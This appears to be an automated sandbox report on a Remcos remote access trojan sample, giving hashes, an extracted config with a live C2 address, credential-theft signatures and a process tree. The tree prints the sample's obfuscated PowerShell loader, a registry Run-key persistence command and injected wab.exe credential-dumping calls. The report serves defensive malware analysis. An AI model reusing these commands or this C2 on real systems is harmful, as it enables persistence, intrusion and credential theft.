Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-08-2024 02:19

General

  • Target

    d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe

  • Size

    636KB

  • MD5

    c1c571c4f8f69d3c8aa0ec091173bd5e

  • SHA1

    a36ac174f8ee2ed2254f69a21799837af58071f2

  • SHA256

    d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb

  • SHA512

    08b540ab5ebb986cc43add736aee38d11a5f0da5252384bb30c7ca7f7b464e63debab4cec5a3dd122e3280f26e57e5ac8adc171e237a681d0e95239bddc11a1d

  • SSDEEP

    12288:5rRo7TKXllTfhmiKdHEHPSXbOp/NoJnYRlXO3iBM4ILaa+Brt:JC7TKXlFfsiMEHPSq8YfMiBMh+ht

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

45.95.169.18:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-HP1D61

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe
    "C:\Users\Admin\AppData\Local\Temp\d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5104
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\Admin\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2212
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:180
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5020
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"
            5⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:708
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\naucrpaacwbawdfsanhditwynzxpircaz"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4176
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\puznr"
          4⤵
            PID:5108
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\puznr"
            4⤵
            • Accesses Microsoft Outlook accounts
            • System Location Discovery: System Language Discovery
            PID:4800
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zxmfsawv"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2760

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat

      Filesize

      144B

      MD5

      15d596db67ae33f92a814c12facd7fbd

      SHA1

      a24ea7235d15bd48b1aa465f12bdd319fef404ca

      SHA256

      94a709da9f3732850b55da7e76f55ec76a8fef807054692f67bc571f53a1fdb3

      SHA512

      2cccb15fcaab8fbd9e2dd4110911eb0ca291aa3e21c929d0f011a980f5f7432e5b83386ebff4306427bd6aeb76fa28a7996934a132166c408b2a87edcf1b2fe7

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_20onfxc3.qgb.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\naucrpaacwbawdfsanhditwynzxpircaz

      Filesize

      4KB

      MD5

      2538ec9e8425a905937573069b77d4c2

      SHA1

      ad0c2b7aff4382e23444d26adac96d9697b849f3

      SHA256

      29338949fae4c88a972837aae898529e4c7a2c4df35982eef2f8d7b602c17f4e

      SHA512

      a867a471b837b9c662528ee7a5904e8fe7b1eebb277b8a7fe4d4caf423fae914baf692bb5004c02ddb539b157d63326178467e28b03aa92a533cda19155d501c

    • C:\Users\Admin\AppData\Local\Temp\nsr9810.tmp\nsDialogs.dll

      Filesize

      9KB

      MD5

      eb2c74e05b30b29887b3219f4ea3fdab

      SHA1

      91173d46b34e7bae57acabdbd239111b5bcc4d9e

      SHA256

      d253ca5aba34b925796777893f114cc741b015af7868022ab1db2341288c55ed

      SHA512

      1bb035260223ec585170f891c2624b9ae98671f225e74b913b40bb77b66e3b9c2016037bc8e4b0ae16367d82590a60a0a3bd95d05139ea2454f02020d1b54dae

    • C:\Users\Admin\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Stenotypistens.Udk

      Filesize

      364KB

      MD5

      4f7bc22100b0ce9f5392bb0b43ab22c9

      SHA1

      322f410d7c94a5f400656e1c49b5d4cef6dde8f2

      SHA256

      67e85d9212594f2e8be65a3a6a3c8625ca5efe8070050c390e918bcd1da16f3a

      SHA512

      dfc1ba12d84c489d6f6417c1c2f775ba107076b48f2f57b0a565070a88f91334187734463f895b17de46acb620347a1fc36c1deef55969942cf4663de48a347b

    • C:\Users\Admin\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy

      Filesize

      54KB

      MD5

      4bb55c98fcfab7c0706cf43af638c89e

      SHA1

      58f5ec920e25fa95c47a826e34736d1159232efd

      SHA256

      fafe02f6852b01802bbfe61fe7bb3de41e3d32dfd7b7054e8da7774cecbb3d8d

      SHA512

      591fb17f2d78e25ef91eeb48d8fee5d09de00e553fa0710c28c84f3f1bc657cc8b4d2a4f6e982e4409d8e3450f60d13e6dbce473d33b3fab3d0eed3b489e5e27

    • memory/180-92-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

    • memory/180-79-0x00000000224A0000-0x00000000224B9000-memory.dmp

      Filesize

      100KB

    • memory/180-98-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

    • memory/180-95-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

    • memory/180-104-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

    • memory/180-89-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

    • memory/180-53-0x0000000077091000-0x00000000771B1000-memory.dmp

      Filesize

      1.1MB

    • memory/180-86-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

    • memory/180-83-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

    • memory/180-101-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

    • memory/180-80-0x00000000224A0000-0x00000000224B9000-memory.dmp

      Filesize

      100KB

    • memory/180-76-0x00000000224A0000-0x00000000224B9000-memory.dmp

      Filesize

      100KB

    • memory/180-51-0x0000000077091000-0x00000000771B1000-memory.dmp

      Filesize

      1.1MB

    • memory/180-61-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

    • memory/180-55-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

    • memory/180-54-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

    • memory/180-52-0x0000000077118000-0x0000000077119000-memory.dmp

      Filesize

      4KB

    • memory/2212-46-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2212-28-0x0000000006280000-0x000000000629E000-memory.dmp

      Filesize

      120KB

    • memory/2212-41-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2212-42-0x000000007343E000-0x000000007343F000-memory.dmp

      Filesize

      4KB

    • memory/2212-43-0x0000000008DA0000-0x000000000CFDF000-memory.dmp

      Filesize

      66.2MB

    • memory/2212-44-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2212-45-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2212-38-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2212-48-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2212-37-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2212-35-0x0000000008720000-0x0000000008D9A000-memory.dmp

      Filesize

      6.5MB

    • memory/2212-33-0x0000000007AF0000-0x0000000008094000-memory.dmp

      Filesize

      5.6MB

    • memory/2212-49-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2212-50-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2212-59-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2212-32-0x0000000006800000-0x0000000006822000-memory.dmp

      Filesize

      136KB

    • memory/2212-10-0x000000007343E000-0x000000007343F000-memory.dmp

      Filesize

      4KB

    • memory/2212-11-0x0000000002CA0000-0x0000000002CD6000-memory.dmp

      Filesize

      216KB

    • memory/2212-12-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2212-13-0x0000000005550000-0x0000000005B78000-memory.dmp

      Filesize

      6.2MB

    • memory/2212-14-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2212-15-0x0000000005290000-0x00000000052B2000-memory.dmp

      Filesize

      136KB

    • memory/2212-17-0x0000000005C60000-0x0000000005CC6000-memory.dmp

      Filesize

      408KB

    • memory/2212-16-0x0000000005BF0000-0x0000000005C56000-memory.dmp

      Filesize

      408KB

    • memory/2212-23-0x0000000005CD0000-0x0000000006024000-memory.dmp

      Filesize

      3.3MB

    • memory/2212-31-0x00000000067A0000-0x00000000067BA000-memory.dmp

      Filesize

      104KB

    • memory/2212-30-0x00000000074A0000-0x0000000007536000-memory.dmp

      Filesize

      600KB

    • memory/2212-29-0x00000000062B0000-0x00000000062FC000-memory.dmp

      Filesize

      304KB

    • memory/2212-39-0x0000000073430000-0x0000000073BE0000-memory.dmp

      Filesize

      7.7MB

    • memory/2760-67-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2760-68-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2760-69-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/4176-70-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/4176-66-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/4176-62-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

    • memory/4800-63-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/4800-64-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/4800-65-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB